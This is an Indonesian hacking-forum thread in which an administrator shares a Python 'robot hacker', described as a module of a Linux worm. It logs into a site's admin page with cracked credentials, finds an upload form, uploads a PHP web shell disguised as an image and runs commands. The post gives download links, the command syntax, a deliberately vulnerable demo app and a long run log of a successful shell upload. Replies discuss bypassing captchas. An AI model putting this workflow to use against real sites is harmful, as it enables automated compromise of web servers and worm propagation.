Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-20-2013, 04:35 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Tools › Bots
Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah

Home General Computer Multimedia Business Lounge

Pages (2): 1 2 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
02-07-2011, 03:43 AM (This post was last modified: 02-07-2011 04:15 AM by mywisdom.)
Post: #1
mywisdom Offline
Administrator
*******
Administrators 		Posts: 921
Joined: Dec 2009
Reputation: 44
Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
http://myw1sd0m.blogspot.com/2011/02/how...ction.html
[Image: worm.jpg]

download robot hacker:
http://www.ziddu.com/download/13701661/r...r.tgz.html
download sql untuk database tes: http://sowiesoft.com/.../produk.sql
yang dibutuhkan :
-os linux
- lampp atau sejenisnya (yg penting bisa apache,php,mysql)
- buat database di mysql dengan nama database: tes ---> buat demo , di robot_hacker ada folder namanya login itu buat demo path admin yg mao dihack, misal disave di /opt/lampp/htdocs , atau path laenya , misal bisa diakses ntar di http://localhost/login
databse buat sample admin login : tes, dengan 1 table:
Code:
-- Database: `tes`
--
CREATE TABLE IF NOT EXISTS `produk` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `nama` tinytext NOT NULL,
  `foto` tinytext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
--

misal 1 path di atas path login siapin file index.php yg isinya:
<?
error_reporting(1);

$k=mysql_connect("localhost","root","");
if($k)
{
mysql_select_db("tes");
$s="select * from `produk`";
$q=mysql_query($s);
while($r=mysql_fetch_row($q))
{
echo "<img src='login/upload/$r[2]'>$r[1]<br><br>";

}

}
?>


-python

sebenernya ini salah 1 modul worm linux
logika:
setelah worm mendapatkan user dan password admin dari hzosql misal dlm bentuk md5 pass-> disubmit ke hash cracker untuk fetch password selanjutnya worm mencari path admin dan terakhir:
worm akan mengeksekusi robot hacker ini dengan modus perintah:
python robot.py 'http://url_path_admin' 'username' 'password' 'perintah'

misalnya : python robot.py 'http://localhost/login' 'admin' 'admin' 'whoami'


berikut ini tampilan kinerjanya:


Code:
root@bt:/home/mywisdom/mekanik/robot_hacker# python robot_hacker.py 'http://localhost/login' 'admin' 'admin' 'whoami'
robot_hacker.py:44: UserWarning: gzip transfer encoding is experimental!
  br.set_handle_gzip(True)
<form action="?page=login" method="post">
user: <input type="text" name="user">
<br>
pass:
<input type="password" name="password">
<br>

<input type="submit" value="login">
</form>

ga nemu post
ga nemu text
ga nemu text
ga nemu text
ga nemu text
ga nemu post
ga nemu text
ga nemu post
ga nemu text
ga nemu post
ga nemu text
ga nemu text
ga nemu post
ga nemu text
ga nemu text
url login http://localhost/login/?page=login
form login user
  
form password password
  
robot_hacker.py:114: UserWarning: gzip transfer encoding is experimental!
  br.set_handle_gzip(True)
auto login:http://localhost/login/?page=login
bukan log out aman di klik:x.php
unso:halaman x
bukan form upload, lanjut cari lagi
bukan log out aman di klik:x.php
unso:halaman x
bukan form upload, lanjut cari lagi
bukan log out aman di klik:upload.php
unso:    

<form enctype="multipart/form-data" action="?up=yes" method="post">
nama:
<input type=text name=nama>
<br>

email:
<input type=text name=email>
<br>

text:
<textarea name=keterangan></textarea>
<br>

file to upload : <input type="file" name="file">
<br>
nomer: <input type=text name=nomer>
<br>
pilih kategori:
<select name=kategori>
<option value=''>pilih ini dulu baru boleh upload :-p</option>

<option value='satu'>satu</option>
<option value='dua'>dua</option>
</select>
<input type="submit" name="sub">
</form>
    

gue temuin page form upload di:upload.php muahahahahahahaha gw emang worm yg cadas bruakakakaka
oye gue mao coba-coba ngupload shell:/home/mywisdom/mekanik/robot_hacker/becak.jpg.php
perhatian!!! gue ini worm bukan orang !!! lu kira gue orang? muka gile lu
auto login:upload.php
data form kotor:
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:POST http://localhost/login/upload.php?up=yes multipart/form-data
  
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:TextControl(nama=)>
  
--------------------------------ditemukan inputbox dengan nama:nama
  
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:TextControl(email=)>
  
--------------------------------ditemukan inputbox dengan nama:email
  
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:TextareaControl(keterangan=)>
  
bukan input box cuy
--------------------------------ditemukan textarea dengan nama:keterangan
  
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:FileControl(file=
bukan input box cuy
bukan textarea cuy
---------------------------------ditemukan file upload dengan nama:file
bukan select juga ni cuy
data form kotor:No files added>)>
  
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:TextControl(nomer=)>
  
--------------------------------ditemukan inputbox dengan nama:nomer
  
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
data form kotor:SelectControl(kategori=[*, satu, dua])>
  
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
perkiraan isi select: satu
---------------------------------ditemukan select dengan nama:kategori
data form kotor:SubmitControl(sub=) (readonly)>>
bukan input box cuy
bukan textarea cuy
bukan buat ngupload cuy
bukan select juga ni cuy
[+]nyoba ngupload dulu cuy
uploading: /home/mywisdom/mekanik/robot_hacker/becak.jpg.php
nama inputan dengan aray:nama
nama inputan dengan aray:email
nama inputan dengan aray:nomer
nama inputan:keterangan
nama inputan:file
nama inputan:kategori
aman
pertama tama kita cari dulu kemungkinan mendapatkan path shell dari halaman setelah submit upload
gak nemu di sini, melanjutkan pencarian path ke halaman depan situs
ada path becak mari kita parsing untuk mendapatkan path becak
tes:<img src='login
belum ditemukan <img src='login
belum ditemukan upload
t:2
hmmm sepertinya ditemukan pola shell kita pada string:becak.jpg.php'>becak.jpg.php<br><br><img src='login
string sebelumnya:upload
string sebelumnya:<img src='login
kemungkinan path kedalaman kedua:login
--->tambalan:upload
kemungkinan kue:becak.jpg.php'>becak.jpg.php<br><br><img src='login
parsingan------------>becak.jpg.php'>becak.jpg.php<br><br><img src
parsingan------------>'login
cake2:becak.jpg.php'>becak.jpg.php<br><br><img src='login
kemungkinan string mengandung path:login
kemungkinan nama file shell:becak.jpg.php
------------url 2 kemungkinan lokasi shell kita--------------
http://localhost/login/login/becak.jpg.php
http://localhost//login/becak.jpg.php
http://localhost//login/upload/becak.jpg.php
http://localhost/login/login/becak.jpg.php
http://localhost/login/login/upload/becak.jpg.php
tidak ditemukan shell kita di http://localhost/login/login/becak.jpg.php
tidak ditemukan shell kita di http://localhost//login/becak.jpg.php
woot ditemukan shell di url:http://localhost//login/upload/becak.jpg.php
nobody
utk poc udah disiapin sample aplikasi dg login admin di folder robot hacker silahkan dipindah ke path htdocs , dan nama databasenya tadi tes
Find all posts by this user
Quote this message in a reply
02-07-2011, 03:47 AM (This post was last modified: 02-07-2011 03:54 AM by android2009.)
Post: #2
android2009 Offline
./Devilz Officer
 		Posts: 81
Joined: Dec 2009
Reputation: 3
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
fungsinya buat apa om?

[Image: 25t7xcm.jpg]
Find all posts by this user
Quote this message in a reply
02-07-2011, 03:50 AM
Post: #3
mywisdom Offline
Administrator
*******
Administrators 		Posts: 921
Joined: Dec 2009
Reputation: 44
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
simulasi hacker yang login ke path admin, mencari form upload, ngupload shell, eksekusi perintah, ini modul linux worm
Find all posts by this user
Quote this message in a reply
02-07-2011, 03:52 AM
Post: #4
android2009 Offline
./Devilz Officer
 		Posts: 81
Joined: Dec 2009
Reputation: 3
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
yg di eksekusi pertama file yg perl apa python?
Find all posts by this user
Quote this message in a reply
02-07-2011, 03:55 AM (This post was last modified: 02-07-2011 03:56 AM by mywisdom.)
Post: #5
mywisdom Offline
Administrator
*******
Administrators 		Posts: 921
Joined: Dec 2009
Reputation: 44
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
yg python , sebenernya buat worm sih tapi coba dites aja
kelemahan:
-gak bisa bypass captcha
- parsing form kadang kurang akurat
- gak bisa bypass validasi form upload yg ngeblok shell
Find all posts by this user
Quote this message in a reply
02-07-2011, 09:14 AM
Post: #6
kiddies Away
Administrator
*******
Administrators 		Posts: 1,223
Joined: Dec 2009
Reputation: 40
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
bypass chaptcha dom...hehe..logicnya kdang beda2 sih...kalo mau sih CMS yang loh serang...biasanya chapchanya sama semuanya...kalo buatan orang kadang suka ribed, pahamin lagi logicya...
Find all posts by this user
Quote this message in a reply
02-07-2011, 01:02 PM
Post: #7
rydcenter Offline
./Devilz Commander
 		Posts: 285
Joined: Feb 2010
Reputation: 8
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
di cicipin dulu om
Visit this user's website Find all posts by this user
Quote this message in a reply
02-07-2011, 01:08 PM
Post: #8
Cruz3N Offline
Mod Terganteng
****
Global Moderators 		Posts: 1,651
Joined: Dec 2009
Reputation: 72
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
Nyebelin banget kata2nya... wokwokwokwokwokowkowkowk

Code:
gue temuin page form upload di:upload.php muahahahahahahaha gw emang worm yg cadas bruakakakaka
oye gue mao coba-coba ngupload shell:/home/mywisdom/mekanik/robot_hacker/becak.jpg.php
perhatian!!! gue ini worm bukan orang !!! lu kira gue orang? muka gile lu
Visit this user's website Find all posts by this user
Quote this message in a reply
02-07-2011, 02:44 PM
Post: #9
blackhat Offline
./Devilz 1st Cadet
 		Posts: 34
Joined: Feb 2011
Reputation: 6
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
(02-07-2011 01:08 PM)Cruz3N Wrote:  Nyebelin banget kata2nya... wokwokwokwokwokowkowkowk

Code:
gue temuin page form upload di:upload.php muahahahahahahaha gw emang worm yg cadas bruakakakaka
oye gue mao coba-coba ngupload shell:/home/mywisdom/mekanik/robot_hacker/becak.jpg.php
perhatian!!! gue ini worm bukan orang !!! lu kira gue orang? muka gile lu

keren. Thanks udah berbagi.
Find all posts by this user
Quote this message in a reply
02-07-2011, 02:49 PM
Post: #10
note Offline
DC Security terganteng
*****
DC Security Grup 		Posts: 1,279
Joined: Feb 2010
Reputation: 13
RE: Simulasi robot hacker: login ke admin page, upload shell dan eksekusi perintah
(02-07-2011 01:08 PM)Cruz3N Wrote:  Nyebelin banget kata2nya... wokwokwokwokwokowkowkowk

Code:
gue temuin page form upload di:upload.php muahahahahahahaha gw emang worm yg cadas bruakakakaka
oye gue mao coba-coba ngupload shell:/home/mywisdom/mekanik/robot_hacker/becak.jpg.php
perhatian!!! gue ini worm bukan orang !!! lu kira gue orang? muka gile lu

wew di coba test ahhh
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (2): 1 2 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-20-2013, 04:35 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE